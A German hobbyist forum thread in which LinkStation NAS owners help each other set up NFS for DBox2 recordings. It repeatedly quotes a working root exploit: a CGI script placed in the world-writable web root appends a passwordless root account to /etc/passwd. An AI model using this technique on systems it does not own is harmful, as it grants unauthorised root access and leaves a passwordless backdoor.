NFS Server für Kuro-Box

[Pleymo]

hi,
...hast Du einen Switch/Hub oder mehrere Netzwerkkarten in Deinem PC oder wie hast Du DBox/PC/Linkstation/DSL-Modem miteinander verbunden?
Fuer sehr kleines Geld (~35 €) bekommst Du einen DSL-Router mit 4-Port Switch...das solltest Du Dir imo unbedingt goennen.
cu,
peter

An meinem Asus DSL-_Modem_ sind 4 Ethernet Ports, wobei jedes angeschlossenes Gerät die ppoe-Einwahl selbst durchführen muss. Dieses fungiert auch als Switch (und das sehr gut). Abgeschlossen daran sind mein PC, die D-Box und die Linkstation. Die 35€ würde ich mir gerne sparen, indem ich auf der LS eine automatisierte pppoe Einwahl realisiere.

P.S: Sorry für das Off-Topic, bitte bescheid sagen, wenn ich zu weit abschweife!

[Pleymo]

hat sich erledigt. du hast mich zum nachforschen angeregt. laut netcologne ist mein asus dsl modem ein reines modem, aber inofiziell doch nicht. http://www.dslrouter-hilfe.de/forum/sho ... ge=1&pp=15
Ich bin überglücklich. schönen tag noch

[petgun]

hi,
ich habe mir den Thread auch mal reingezogen...Du hast das verstanden und auch schon umgesetzt und jetzt arbeitet der von NC kastrierte Asus DSL-Router wie ein handelsueblicher DSL-Router und Du kannst Dir die pppoe-Einwahl Klimmzuege mit jedem Client sparen, oder?
Ich wollte auch zu NC....jetzt gibt's aber wirklich nur noch saubloede DSL-Modems/Bridges mit _einem_ Netzwerkanschluss und an einem zusaetzlichen DSL-Router fuehrt kein Weg vorbei.

cu,
peter

[blaueelise]

hi,

PS:...bitte schickt mir erst dann eine PN mit eurer EMail Adresse fuer das Paket wenn ihr Root Access habt...

Code: Alles auswählen

Gaining Root Access 

You will first need to gain root access on your LinkStation. This works if you have either firmware version 1.44_11 or 1.45_13 installed. Here are the steps (assuming that the LinkStation? is located at IP address 192.168.1.100) 


On the PC, open up the browser window and create an account on the LinkStation? using the web-based adminstration interface. Point your browser to http://192.168.1.100. Under Security and Shared Folder Setup, create a user user1. 


Open a telnet window on your PC 
telnet 192.168.1.100, login with user1 using the password just created. 
cat /etc/linkstation_release to confirm the version and release history 
cat /etc/thttpd.conf to confirm the webserver setting 
            user1@LINKSTATION:/etc# cat thttpd.conf 
            dir=/www user=root 
            logfile=/var/log/thttpd.log 
            pidfile=/var/run/thttpd.pid 
            port=80 charset= 
            cgipat=/cgi-bin*/* 
            root@LINKSTATION:/etc# 


Checking the webserver document root (/www) shows that the directory is world writable, the http server is run as root and the cgipath contains a wildcard in the directory name. 
            root@LINKSTATION:/etc# ls -ald /www 
            drwxrwxrwx 9 root root 1024 Oct 9 12:43 /www 
            root@LINKSTATION:/etc# 


Create a directory and a file to exploit this vulnerability 
            mkdir /www/cgi-bin3 
            echo '#! /bin/sh' > /www/cgi-bin3/breakout.sh 
            echo 'echo "myroot::0:0:root:/root:/bin/bash" >> /etc/passwd' >> /www/cgi-bin3/breakout.sh 


From the telnet window change the file's attributes to allow its execution. 
            chmod a+rx /www/cgi-bin3/breakout.sh 


Point the browser to http://192.168.1.100/cgi-bin3/breakout.sh 
go back to your telnet window and check if the /etc/passwd contains your modification 
login again with telnet, now using myroot as username and no password

<edit>
Link zum Paket hinzugefuegt...wielange das gut geht weiss ich nicht! Und hier die Beschreibung die ich bisher dazu verschickt habe:

Code: Alles auswählen

hi,
packet my.tar einfach auf die Linkstation kopieren. Bei mir heist die Freigabe 'rec' Dann per telnet auf die Linkstation gehen (Rootzugang musst Du allerdings haben...Link fuer die Anleitung gibt's im Forum) und folgendes eingeben:

cp /mnt/rec/my.tar /my.tar
tar -xf /my.tar
rm /my.tar

dann die exports unter /etc/exports auf Deine Beduerfnisse anpassen...meine sieht so aus:

/mnt/rec/Movies/ 192.168.0.4(rw,async,no_root_squash)

wobei 192.168.0.4 die IP der Box ist und 'Movies' der Ordner auf der Linkstation ist, in dem Deine Aufnahmen gespeichert werden..also einen Ordner 'Movies' auf der Linkstation anlegen wenn Du das uebernimmst. Linkstation neu starten und fertig :-)

Auf der Box folgende Mountoptionen einstellen (passend zu der/meiner exports)

.
Verzeichnis/Freigabe /mnt/rec/Movies
lokales Verzeichnis /mnt/filme
.
Mount-Optionen rw,tcp,noatime
Mount-Optionen nolock,rzize=32768,wsize=32768
.

damit klappt es bei mir super. Ich hoffe Du kommst damit klar. Waere nett wenn Du im Forum laut gibst ob/wie es geklappt hat.

Viel Erfolg,
peter

</edit>

Mit dieser Anleitung bekomme ich keinen root Access. Was mache ich bloß falsch
BUFFALO INC. Link Station series HD-HLAN (HIDETADA)

LINKSTATION login: user1
Password:
Linux (none) 2.4.17_mvl21-sandpoint #990 2004ǯ 5·î 21Æü ¶âÍËÆü 13:39:00 JST ppc
unknown
user1@LINKSTATION:~$ cat /etc/linkstation_release
PRODUCTNAME=HD-HLAN(HIDETADA)
VERSION=1.45
SUBVERSION=HDD 1.2(WR)
PRODUCTID=0x00000003
BUILDDATE=2004/11/09 18:58:35
user1@LINKSTATION:~$
user1@LINKSTATION:~$ cat /etc/thttpd.conf
dir=/www
user=root
logfile=/var/log/thttpd.log
pidfile=/var/run/thttpd.pid
port=80
charset=
cgipat=/cgi-bin*/*
user1@LINKSTATION:~$

Vielleicht kann mir ja jemand weiterhelfen, oder eine Anleitung für "Dumme" zukommen lassen.

[petgun]

..mach doch einfach weiter bei 'Checking...'
ist alles gruen bisher...Du hast noch keinen root Zugang und bist als 'user1' eingeloggt...deshalb steht da bei Dir

Code: Alles auswählen

user1@LINKSTATION:~$ 

und nicht

Code: Alles auswählen

root@LINKSTATION:/etc#

..das ist der Promt und Du musst das '/etc#' bei Deinen Eingaben weglassen....

<edit>
ich hoffe jetzt ist es verstaendlicher..
</edit>

[Pleymo]

hey petgun. ich mach doch mal weiter bzgl. pppoe für die linkstation. habe schon einiges dazu gefunden (z.B. http://sourceforge.net/projects/adsl4linux/) und werde mich nach der arbeit an die sache machen. wieso das ganze? War in der Mittagspause voller Tatendrang zuhause und hab mich an das Asus begeben. ich komme an das optionsmenü nicht ran. netcologne hat das asus interface-kennwort geändert und seit september 2003 hat es keiner per bruteforce oder wie auch immer rausbekommen.

btw. es gibt bestimmt auch andere ls besitzer, die so etwas gebrauchen könnten denke ich mal. von daher werde ich euch auf dem laufenden halten falls ich etwas geschafft habe.

[petgun]

hi,

btw. es gibt bestimmt auch andere ls besitzer, die so etwas gebrauchen könnten denke ich mal..

..mag sein...ich will Deinen Tatendrang auch nicht daempfen. Fuer mich bleibt das eine akademische Spielerei...was ist mit einer Firewall? Die ist in so einem 30Europa Teil dabei...mag sein das die DBox und auch die Linkstation (bisher) nicht angreifbar sind, aber Dein PC ist es mit Sicherheit...also musst Du _zusaetzlich_ eine Firewall laufen lassen....lass es lieber sein und spare (wenn Du die Kohle nicht hast) auf einen 'richtigen' DSL-Router...30 Europas sind ca. 8 Schachteln Zigaretten die Du verqualmst um das 'Problem' zu loesen...das ist ungesund und schwachsinnig dazu.

just my 2c,
peter

--
Um klar zu sehen, genügt oft ein Wechsel der Blickrichtung.
[Antoine de Saint-Exupéry]

[Pleymo]

30 Europas sind ca. 8 Schachteln Zigaretten die Du verqualmst um das 'Problem' zu loesen...das ist ungesund und schwachsinnig dazu.

ich bin doch nichtraucher
hmm ok, also auch ne firewall für die ls installieren. spaß beiseite. Ich werde, wenn ich es heute nicht schaffe, den auf der ls zum laufen zu bringen, morgen zum saturn laufen und mir einen besorgen... könnte man ja evt. die blöde windows firewall abschalten, und hat auch schutz von innen nach aussen. nur blöd, wenn ein weiteres gerät an meiner stromrechnung arbeitet.
ausserdem bin ich inspiriert davon, was die japaner aus dem teil machen. die haben schon per remote desktop nen kde am laufen usw.

[petgun]

hi,

..morgen zum saturn laufen und mir einen besorgen....

..schlafe lieber noch eine weitere Nacht drueber und ueberlege auch was Du vielleicht erst in in ein paar Monaten brauchen koenntest...
2*USB 2.0, Printserver parallel+USB, DSL-Router, 4-Port Switch, WLAN und einiges mehr bietet Dir das oben beschriebene Asus Teil fuer schlappe 88 Euro (bei Mix) und Linux laueft da auch drauf..und jede Menge Software gibt's auch dafuer (forum.chupa.nl).

Vielleicht sparst Du noch einen Monat bis Du Dir so eine eierlegende Wollmilchsau leisten kannst..manchmal ist es einfach nur schoen alle diese Moeglichkeiten zu haben..auch wenn man sie im Moment nicht braucht...;-)

viel Spass bei der Entscheidungsfindung,
peter

[blaueelise]

..mach doch einfach weiter bei 'Checking...'
ist alles gruen bisher...Du hast noch keinen root Zugang und bist als 'user1' eingeloggt...deshalb steht da bei Dir

Code: Alles auswählen

user1@LINKSTATION:~$ 

und nicht

Code: Alles auswählen

root@LINKSTATION:/etc#

..das ist der Promt und Du musst das '/etc#' bei Deinen Eingaben weglassen....

<edit>
ich hoffe jetzt ist es verstaendlicher..
</edit>

Mir ist aber nicht nicht bewusst, wo ich /etc# eingegeben haben sollte , und wenn ich bei cat /etc/thttpd.conf das etc/ weglasse kommt auch nichts bei raus.
Entschuldige, aber ich bin die absolute Telnet-Null, und kann nur nach Anleitung arbeiten, wenn ich sie verstehen würde.

[Zaphot]

Das was du bisher gemacht hast passt schonmal. vergiss dein "/etc/-Problem"
Du musst nur noch folgende schritte ausführen:

Code: Alles auswählen

mkdir /www/cgi-bin3
echo '#! /bin/sh' > /www/cgi-bin3/breakout.sh
echo 'echo "myroot::0:0:root:/root:/bin/bash" >> /etc/passwd' >> /www/cgi-bin3/breakout.sh 
chmod a+rx /www/cgi-bin3/breakout.sh

Da das absolute Pfade sind spielt es keine Rolle in welchem Verzeichnis du bist. Danach musst du nur noch das Skript aufrufen:

Code: Alles auswählen

http://192.168.1.100/cgi-bin3/breakout.sh 

@Pleymo:
Du kannst ja aus der LinkStation nen Router bauen

[blaueelise]

Danach musst du nur noch das Skript aufrufen:

Code: Alles auswählen

http://192.168.1.100/cgi-bin3/breakout.sh 

@Pleymo:
Du kannst ja aus der LinkStation nen Router bauen

Tja, und wenn ich das gemacht habe, dann öffnet sich keine Seite.

Wenn ich nur http://192.168.1.100/cgi-bin3 eingebe, dann erhalte ich das:

Index of /cgi-bin3/

mode links bytes last-changed name
dr-x 2 1024 Mar 17 17:15 ./
drwx 9 1024 Mar 17 17:13 ../
-r-x 1 66 Mar 17 18:01 breakout.sh*


Wenn ich dann auf breakout.sh klicke, dann pasiert garnichts.
Danke für die Geduld.

[petgun]

Tja, und wenn ich das gemacht habe, dann öffnet sich keine Seite.

das ist auch richtig so...immer noch alles gruen und Du solltest jetzt root Zugang haben. Gehe mit Telnet auf die Linkstation und installiere das NFS-Paket....

viel Erfolg,
peter

[blaueelise]

Tja, und wenn ich das gemacht habe, dann öffnet sich keine Seite.

das ist auch richtig so...immer noch alles gruen und Du solltest jetzt root Zugang haben. Gehe mit Telnet auf die Linkstation und installiere das NFS-Paket....

viel Erfolg,
peter

und da ist das nächste Problem:
wie bekomme ich die my-Datei von dir auf die Linkstation.
Bei den Anleitungen verstehe ich nur Bahnhof Einfach übers Netzwerk reinkopieren??? Wäre wohl zu einfach.
Der Telnet-Kram ist der absolute Horror für mich, allerdings werde ich auch nicht aufgeben.

[Zaphot]

Doch, einfach über Netzwerk kopieren. Bei petgun hieß die Freigabe "rec". Wenn das bei dir anders ist, musst du noch die Pfade anpassen.

[blaueelise]

Doch, einfach über Netzwerk kopieren. Bei petgun hieß die Freigabe "rec". Wenn das bei dir anders ist, musst du noch die Pfade anpassen.

Kann ich die datei einfach in den "Share-Ordner" kopieren, oder muss ich da was spezielles machen Z.B.:cp /mnt/rec/my.tar ??
So habe ich das schon probiert, nur leider sagt mir Telnet dann, dass er CP nicht finden kann.

[Zaphot]

Share Ordner erstellen, den Ordner "rec" nennen, my.tar in den Ordner rein und an die Anleitung halten.

[petgun]

@Dboxdienstleister

Bitte fuer kleines Geld einen 'NAS-DBox2-Ready to Record-Umbau-Service' anbieten

@all
sind die Anleitungen wirklich so unverstaendlich? Bitte eine neue fuer _jeden_ verstaendliche Anleitung schreiben wer sich dazu berufen fuehlt...ich kanns nicht besser.

[blaueelise]

@Dboxdienstleister

Bitte fuer kleines Geld einen 'NAS-DBox2-Ready to Record-Umbau-Service' anbieten
Ich wills ja alleine packen

@all
sind die Anleitungen wirklich so unverstaendlich? Bitte eine neue fuer _jeden_ verstaendliche Anleitung schreiben wer sich dazu berufen fuehlt...ich kanns nicht besser.

Na für jemanden, der noch nie mit Telnet gearbeitet hat, und dem auch DOS-Befehle ein Graus sind, ist es schon eine schöne Herausforderung.
Ich habe jetzt mit http://192.168.1.100 auf die Linkstation zugegriffen, und unter Shared Folder Setup einen Ordner rec
angelegt. Mit telnet kann ich aber auf den rec-Ordner nicht zugreifen, bzw. bin zu blöd dazu.
Ich bin mir auch nicht sicher, ob ich nun wirklich Root-Zugang habe.

[petgun]

hi,
sei mir bitte nicht boese wenn ich hier die Segel streiche...ich kann leider nicht durch Deine Augen schauen und habe keine Ahnung was Du gemacht hast...und meine Geduld ist zZt. leider auch endlich. Wenn ich hier weitermachen muss kann ich fuer nix garantieren...deshalb lass ich es lieber...zumindest fuer heute.

viel Erfolg,
peter

[blaueelise]

hi,
sei mir bitte nicht boese wenn ich hier die Segel streiche...ich kann leider nicht durch Deine Augen schauen und habe keine Ahnung was Du gemacht hast...und meine Geduld ist zZt. leider auch endlich. Wenn ich hier weitermachen muss kann ich fuer nix garantieren...deshalb lass ich es lieber...zumindest fuer heute.

viel Erfolg,
peter

ok, danke trotzdem!

[Zaphot]

Du musst dich als user "myroot" einloggen.

[blaueelise]

Du musst dich als user "myroot" einloggen.

Danke, "myroot" geht. Nur der Rest ist wieder ein Problem.
Wie genau kann ich auf meinen angelegten Ordner rec in dem die Datei my.tar liegt zugreifen??

[Zaphot]

Du musst nicht direkt darauf zugreifen. Einfach die Befehle ausführen, die im HowTo stehen. Die Pfade passen.

[blaueelise]

Du musst nicht direkt darauf zugreifen. Einfach die Befehle ausführen, die im HowTo stehen. Die Pfade passen.

So, scheinbar ist mir nach dem formatieren der Platte, und nochmaliges Firmware -Update, der Root-Zugang gelungen.
Dann habe ich einen Ordner rec angelegt, und my reingepackt, dann die folgenden Befehle ausgeführt, welche alle ohne Fehlermeldungen abgearbeitet wurden.

root@LINKSTATION:~# cp /mnt/rec/my.tar /my.tar
root@LINKSTATION:~# tar -xf /my.tar
root@LINKSTATION:~# rm /my.tar

.. Ist das jetzt gut??? Nach einem Freigabenamen wurde aber nie gefragt.

Als ich dann die Exports verändern wollte, gab's aber wieder Probleme:
root@LINKSTATION:~# /etc/exports
bash: /etc/exports: No such file or directory


Gruß André